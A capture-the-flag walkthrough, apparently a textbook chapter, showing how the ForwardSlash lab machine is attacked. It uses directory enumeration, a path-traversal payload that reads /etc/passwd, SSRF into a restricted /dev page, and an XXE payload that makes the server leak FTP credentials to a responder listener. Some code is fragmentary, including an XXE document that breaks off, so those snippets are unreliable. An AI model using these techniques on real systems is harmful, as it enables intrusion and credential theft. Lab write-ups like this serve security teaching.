Exercise: Enumerating and exploiting XXE on ForwardSlash

We covered the first part of this machine in Chapter 2. We had discovered a site backup.forwardslash.htb which presented us with a login page. We can explore this site with gobuster looking for directories and PHP files:
└──╼ $gobuster dir -t 50 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u
/login.php (Status: 200)
/register.php (Status: 200)
/index.php (Status: 302)
/welcome.php (Status: 302)
/dev (Status: 301)
/api.php (Status: 200)
/environment.php (Status: 302)
/logout.php (Status: 302)
/config.php (Status: 200)
/hof.php (Status: 302)
If we try and got to the /dev directory, we get a 403 Access Denied:
403 Access Denied
Access Denied From
It seems that this directory is not accessible from outside IP addresses. The login page does have a link to /register.php and so we can create an account on the site there. Using the new credentials, we can log in and get access to a dashboard page
Dashboard home page for users on ForwardSlash
The page of interest is for changing your profile picture which reports that the functionality has been disabled because of a hack of the site.
Change profile picture page on ForwardSlash
The text box and Submit button have been disabled by adding the attribute disabled="" into the HTML for these elements. If you right click on the web page in the browser and select Inspect Element, you will be able to see the HTML for the page in the Inspector tab of the browser developer tools (Figure 3-7).
Inspecting the HTML code for the page profilepicture.php
You can click on the HTML where it says disabled in the form section and delete it for both the text box and the submit button. Let us test for Local File Inclusion (LFI) by pointing the URL in the text box to a local file like /etc/passwd. Switch FoxyProxy to use the Burp proxy and enter ../../../etc/passwd into the text box before pressing the Submit button. Once intercepted in Burp, send the request to the Repeater tab and press Send to send it to the server. The response includes the file!
HTTP/1.1 200 OK
<!DOCTYPE html>
<meta charset="UTF-8">
<link rel="stylesheet" href="bootstrap.css">
<style type="text/css">
body{ font: 14px sans-serif; text-align: center; }
<div class="page-header">
<h1>Change your Profile Picture!</h1>
<font style="color:red">This has all been disabled while we try to get
back on our feet after the hack.<br><b>-Pain</b></font>
<form action="/profilepicture.php" method="post">
<input type="text" name="url" disabled style="width:600px"><br>
<input style="width:200px" type="submit" value="Submit" disabled>
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
This shows a couple of users, pain and chiv. If we now try LFI on the /dev directory, it will include the file index.php from there and we can read the contents:
<h1>XML Api Test</h1>
<h3>This is our api test for when our new website gets refurbished</h3>
<form action="/dev/index.php" method="get" id="xmltest">
<textarea name="xml" form="xmltest" rows="20" cols="50"><api>
<input type="submit">
<!-- TODO:
Fix FTP Login
Do you remember how we got a 403 error when we tried to access this directory before with an error message saying we couldn't access it from our IP address? Well, we have now found a way of exploiting a SSRF (Server Side Request Forgery) by accessing the site from the web server itself using LFI.
The returned information suggests a function to test XML input and so we can test if the site is vulnerable to XXE. This next part is going to be a leap of faith as to how you are supposed to work out that what the XML will do is try an FTP login, however, there is a clue in the TODO message to "Fix FTP Login". We can construct an XML document that will execute an FTP login as follows:
<?xml version="1.0" ?>
<!DOCTYPE html [
<!ELEMENT bar >
We can then send that to the /dev/index.php page using the request in Burp by passing the XML as a parameter to http://backup.fowardslash.htb/dev/index.php?xml=<XXE code>. The XML code needs to be URL encoded twice and so select the XML code in Burp and right click and select URL encode all characters. Repeat this. Before sending the request, we can start the tool responder to listen for FTP requests and print out the username and password that has been supplied:
└──╼ $sudo responder -I tun0
[+] Servers:
FTP server [ON]
When the request is sent in Burp, we get a hit:
[+] Listening for events...
[FTP] Cleartext Client :
[FTP] Cleartext Username : chiv
[FTP] Cleartext Password : N0bodyL1kesBack/
This then gives us credentials to use with SSH to get on the box as user chiv. This user doesn't have access to the user flag and you will need to do some lateral movement to get the user pain. However, that involves another SUID file and we can leave that as an exercise for later.